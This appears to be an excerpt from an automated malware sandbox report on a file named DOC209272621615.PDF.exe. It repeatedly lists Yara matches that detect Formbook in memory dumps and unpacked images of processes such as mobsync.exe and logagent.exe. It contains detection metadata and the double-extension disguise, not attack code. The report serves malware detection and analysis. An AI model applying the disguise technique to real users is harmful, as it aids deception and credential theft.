Source: Yara match	File source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: DOC209272621615.PDF.exe

Uses 32bit PE files

Show sources

Source: DOC209272621615.PDF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Yara signature match

Show sources

Source: DOC209272621615.PDF.exe, type: SAMPLE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.0.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.0.DOC209272621615.PDF.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 10.2.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.DOC209272621615.PDF.exe.2686268.2.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
